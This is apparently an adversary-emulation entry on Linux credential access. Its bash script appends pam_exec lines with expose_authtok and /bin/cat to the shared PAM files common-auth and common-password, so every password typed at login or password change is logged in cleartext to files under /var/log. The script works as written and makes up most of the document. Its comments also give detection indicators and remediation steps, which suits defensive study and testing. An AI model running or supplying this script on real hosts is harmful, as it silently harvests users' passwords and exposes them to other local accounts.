Secondary Categories: 02 - Credential Access
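Each time a user authenticates or changes their password, the password itself is written in cleartext to the log file we specified. This works because pam_exec's expose_authtok option passes the password to the executed command on stdin, and /bin/cat copies it to the file named by log=.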
#!/bin/bash
# Appends pam_exec entries to two shared PAM configuration files so that the
# authentication token (the user's password) is copied into files under
# /var/log. Both /etc/pam.d and /var/log are typically writable only by root.
#
# Create the two capture files if they do not exist yet. touch leaves the
# permissions to the caller's umask, so the files may be readable by other
# local accounts -- NOTE(review): nothing here restricts the mode.
touch /var/log/systok.log
touch /var/log/syscommon.log
#
# pam_exec.so runs the command given at the end of the line. expose_authtok
# makes the module hand the password to that command on stdin, and log=FILE
# sends the command's output to FILE; with /bin/cat as the command, the
# password ends up in the log file in cleartext.
#
# Detection: any line under /etc/pam.d that combines pam_exec.so with
# expose_authtok deserves review, as do unexpected writes to common-auth and
# common-password (file-integrity monitoring or an audit watch on /etc/pam.d
# covers both). The two log paths below are host indicators for this script.
# Remediation: remove the appended lines, delete the capture files, and reset
# the passwords of accounts that authenticated while the entries were active.
echo "auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat" >> /etc/pam.d/common-auth
echo "auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat" >> /etc/pam.d/common-password